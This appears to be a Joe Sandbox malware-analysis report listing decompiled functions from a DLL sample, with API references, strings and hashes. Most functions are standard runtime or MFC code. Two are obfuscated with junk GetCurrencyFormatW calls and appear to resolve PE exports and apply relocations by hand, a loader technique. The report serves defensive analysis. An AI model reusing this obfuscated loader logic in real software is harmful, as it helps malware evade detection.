C-Code - Quality: 91%

			E10026012(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10048dc8 = GetProcAddress(_t37, "FlsAlloc");
					 *0x10048dcc = GetProcAddress(_t37, "FlsGetValue");
					 *0x10048dd0 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10048dc8;
					_t40 = TlsSetValue;
					 *0x10048dd4 = _t7;
					if( *0x10048dc8 == 0) {
						L6:
						 *0x10048dcc = TlsGetValue;
						 *0x10048dc8 = E10025CC9;
						 *0x10048dd0 = _t40;
						 *0x10048dd4 = TlsFree;
					} else {
						__eflags =  *0x10048dcc;
						if( *0x10048dcc == 0) {
							goto L6;
						} else {
							__eflags =  *0x10048dd0;
							if( *0x10048dd0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10045960 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10048dcc);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10020E51();
							 *0x10048dc8 = E10025BFA( *0x10048dc8);
							 *0x10048dcc = E10025BFA( *0x10048dcc);
							 *0x10048dd0 = E10025BFA( *0x10048dd0);
							 *0x10048dd4 = E10025BFA( *0x10048dd4);
							_t18 = E10023E72();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10025CFC();
								goto L15;
							} else {
								_push(E10025E88);
								_t21 =  *((intOrPtr*)(E10025C66( *0x10048dc8)))();
								__eflags = _t21 - 0xffffffff;
								 *0x1004595c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1002695E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x1004595c);
										__eflags =  *((intOrPtr*)(E10025C66( *0x10048dd0)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10025D39(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10025CFC();
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,100207BA,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10026018
__mtterm.LIBCMT ref: 10026024

Part of subcall function 10025CFC: __decode_pointer.LIBCMT ref: 10025D0D
Part of subcall function 10025CFC: TlsFree.KERNEL32(00000020,10020856,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10025D27

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1002603A
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10026047
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10026054
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10026061
TlsAlloc.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260B1
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260CC
__init_pointers.LIBCMT ref: 100260D6
__encode_pointer.LIBCMT ref: 100260E1
__encode_pointer.LIBCMT ref: 100260F1
__encode_pointer.LIBCMT ref: 10026101
__encode_pointer.LIBCMT ref: 10026111
__decode_pointer.LIBCMT ref: 10026132
__calloc_crt.LIBCMT ref: 1002614B
__decode_pointer.LIBCMT ref: 10026165
__initptd.LIBCMT ref: 10026174
GetCurrentThreadId.KERNEL32 ref: 1002617B

Strings

FlsGetValue, xrefs: 1002603C
KERNEL32.DLL, xrefs: 10026013
FlsFree, xrefs: 10026056
FlsSetValue, xrefs: 10026049
FlsAlloc, xrefs: 10026034

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
Instruction ID: 704b4601cb084f4dd452549cd158f7ffd0a67ac7cd9a7aed0fe10d7678a8cbb0
Opcode Fuzzy Hash: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
Instruction Fuzzy Hash: 8631A435D02321AEF751EF74AD8490F3BE5EB56252B504926F401C72F2EB329940CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1001E144 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001E144(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x1001e151
0x1001e15a
0x1001e163
0x1001e16d
0x1001e177
0x1001e181
0x1001e18b
0x1001e195
0x1001e19f
0x1001e1a9
0x1001e1b3
0x1001e1bd
0x1001e1c2
0x1001e1c9

APIs

RegisterClipboardFormatA.USER32(Native), ref: 1001E153
RegisterClipboardFormatA.USER32(OwnerLink), ref: 1001E15C
RegisterClipboardFormatA.USER32(ObjectLink), ref: 1001E166
RegisterClipboardFormatA.USER32(Embedded Object), ref: 1001E170
RegisterClipboardFormatA.USER32(Embed Source), ref: 1001E17A
RegisterClipboardFormatA.USER32(Link Source), ref: 1001E184
RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1001E18E
RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1001E198
RegisterClipboardFormatA.USER32(FileName), ref: 1001E1A2
RegisterClipboardFormatA.USER32(FileNameW), ref: 1001E1AC
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1001E1B6
RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1001E1C0

Strings

FileNameW, xrefs: 1001E1A4
FileName, xrefs: 1001E19A
OwnerLink, xrefs: 1001E155
Object Descriptor, xrefs: 1001E186
Rich Text Format, xrefs: 1001E1AE
Embed Source, xrefs: 1001E172
ObjectLink, xrefs: 1001E15E
Native, xrefs: 1001E14C
RichEdit Text and Objects, xrefs: 1001E1B8
Link Source Descriptor, xrefs: 1001E190
Embedded Object, xrefs: 1001E168
Link Source, xrefs: 1001E17C

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
Instruction ID: 4b9fafc3805f733a061432fadfe8ab03a294f1ea68a7cded52070413de5cc64b
Opcode Fuzzy Hash: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
Instruction Fuzzy Hash: 600144708007949ECB32EFB69C08C8BBAE5EED57117024D6EE2858F610E778E641CF84

Uniqueness

Uniqueness Score: -1.00%

Function 1000290C Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000290C(signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				unsigned int _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				signed short* _v24;
				int _t73;
				intOrPtr* _t80;
				short* _t132;
				short* _t156;

				_t156 = L"xadqsavcbdfewescGADW";
				_t132 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc + _v20;
				_t73 =  *_a4 + 0xa0 + (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _v20) * 8;
				_v20 = _t73;
				if( *((intOrPtr*)(_t73 + 4)) != 0) {
					_a4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) << 3;
					_t80 = (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) + _a4) *  *0x100440d0 +  *_v20 + _v16;
					while(1) {
						_a4 = _t80;
						if( *_t80 <= 0) {
							break;
						}
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 +  *_a4 + _v16;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + 8;
						_v24 = _v20 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 * 2 + _a4;
						_v20 = 0;
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						if(GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v12 == 0) {
							L7:
							_t80 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 4));
							continue;
						} else {
							goto L4;
						}
						do {
							L4:
							_v12 = ( *_v24 & 0x0000ffff) >> GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + 0xc;
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 + 0x00000fff &  *_v24 & 0x0000ffff;
							if(_v12 == 3) {
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 << 2;
								_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 + _v12 + _v8 + _v4;
								 *_v8 =  *_v8 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _a8;
							}
							_v20 = _v20 + 1;
							GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9);
							_v24 =  &(_v24[1]);
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						} while (_v20 < GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v8);
						goto L7;
					}
					return 1;
				}
				return 0 | _a8 == 0x00000000;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 1000293F
GetCurrencyFormatW.KERNEL32 ref: 10002958
GetCurrencyFormatW.KERNEL32 ref: 10002975
GetCurrencyFormatW.KERNEL32 ref: 100029B2
GetCurrencyFormatW.KERNEL32 ref: 100029C7

Strings

xadqsavcbdfewescGADW, xrefs: 10002925, 1000292A, 1000294D, 1000296A, 100029AD, 100029B9, 100029E8, 10002A07, 10002A20, 10002A47, 10002A6B, 10002A94, 10002AB2, 10002AE9, 10002AFE, 10002B22, 10002B4F, 10002B62, 10002B7E, 10002BAB
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002917, 1000292D, 10002932, 10002950, 1000296D, 100029AF, 100029BC, 100029EB, 10002A0A, 10002A23, 10002A4F, 10002A6E, 10002A97, 10002AB8, 10002AEC, 10002B01, 10002B29, 10002B52, 10002B65, 10002B81, 10002BAE

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
Instruction ID: 79824c52bf8429aa3b3288a891149b50f2ccf3fe83c12eb32a247a59d7a1ec18
Opcode Fuzzy Hash: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
Instruction Fuzzy Hash: 19815971A44315BFE214DBA1CD86F1BBBECEB8AB48F01081EF7409A2D1D671A9108F65

Uniqueness

Uniqueness Score: -1.00%

Function 1000C177 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000C177(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E1001FC2D(E10033686, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x10004e88);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10010A4A(_t94, 0x10048490, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E10004E6E(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000EC09(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1004886c;
						if( *0x1004886c == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1004846c;
								if( *0x1004846c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1004846c; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E1000C033);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E10020F40(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E100093B7(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1004846c = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E1002290B(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000EC55(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000A931(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1000B02E);
							__eflags = _t83 - E1000B02E;
							if(_t83 != E1000B02E) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000E519();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E10005CC1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E1001FCB0(_t94, _t105, _t110);
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 1000C181

Part of subcall function 10010A4A: __EH_prolog3.LIBCMT ref: 10010A51

CallNextHookEx.USER32 ref: 1000C1C5

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetClassLongA.USER32 ref: 1000C209
GlobalGetAtomNameA.KERNEL32 ref: 1000C233
SetWindowLongA.USER32 ref: 1000C288
_memset.LIBCMT ref: 1000C2D2
GetClassLongA.USER32 ref: 1000C302
GetClassNameA.USER32(?,?,00000100), ref: 1000C323
GetWindowLongA.USER32 ref: 1000C347
GetPropA.USER32 ref: 1000C361
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1000C36C
GetPropA.USER32 ref: 1000C374
GlobalAddAtomA.KERNEL32 ref: 1000C37C
SetWindowLongA.USER32 ref: 1000C38A
CallNextHookEx.USER32 ref: 1000C3A2
UnhookWindowsHookEx.USER32(?), ref: 1000C3B6

Strings

ime, xrefs: 1000C23C
#32768, xrefs: 1000C2E4, 1000C2E9, 1000C333
AfxOldWndProc423, xrefs: 1000C35A, 1000C35F, 1000C36A, 1000C372, 1000C37B

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
Instruction ID: 7666ce8964d8ee3f6bc6ffcfd40649ad75606c78465d6ba84a3d7def91f03792
Opcode Fuzzy Hash: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
Instruction Fuzzy Hash: F461B17190036AAFEB15DB60CC49F9E7BB8EF083D1F114154F509A6196DB34AE81CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10001688 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 204
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E10001688(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _v20;
				void* _t113;
				short* _t126;
				short* _t142;

				_t142 = L"xadqsavcbdfewescGADW";
				_t126 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 << 6) + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) * 0xf8;
				_v16 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) + _v16) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x3c)) + _a4;
				_v16 = _v16 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d8 * 8;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d4 * 0x28 +  *_v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc;
				_v12 =  *((intOrPtr*)(_v20 + 0x20)) + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 * 4 + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc << 2;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x1c)) + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x24)) + _v16 + _a4;
				_v16 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18)) == 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t113 = E100014CF( *((intOrPtr*)(_v12 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc + _v16) * 4)) + _a4);
					_push(0x22b9);
					_push(_t142);
					_push(0);
					_push(_t126);
					_push(0x11d4);
					_push(0);
					if(_t113 == _a8) {
						break;
					}
					_v16 = _v16 + 1;
					if(_v16 < GetCurrencyFormatW(??, ??, ??, ??, ??, ??) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18))) {
						continue;
					}
					goto L3;
				}
				_v8 =  *(_v8 + (GetCurrencyFormatW() *  *0x100440d4 + _v16) * 2) & 0x0000ffff;
				return  *((intOrPtr*)(_v4 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + _v8) * 4)) + _a4;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100016B0
GetCurrencyFormatW.KERNEL32 ref: 100016D0
GetCurrencyFormatW.KERNEL32 ref: 100016E8
GetCurrencyFormatW.KERNEL32 ref: 10001710
GetCurrencyFormatW.KERNEL32 ref: 10001731
GetCurrencyFormatW.KERNEL32 ref: 10001757
GetCurrencyFormatW.KERNEL32 ref: 10001770
GetCurrencyFormatW.KERNEL32 ref: 1000179B
GetCurrencyFormatW.KERNEL32 ref: 100017B7
GetCurrencyFormatW.KERNEL32 ref: 100017DF
GetCurrencyFormatW.KERNEL32 ref: 100017FA
GetCurrencyFormatW.KERNEL32 ref: 10001826
GetCurrencyFormatW.KERNEL32 ref: 10001844
GetCurrencyFormatW.KERNEL32 ref: 10001879
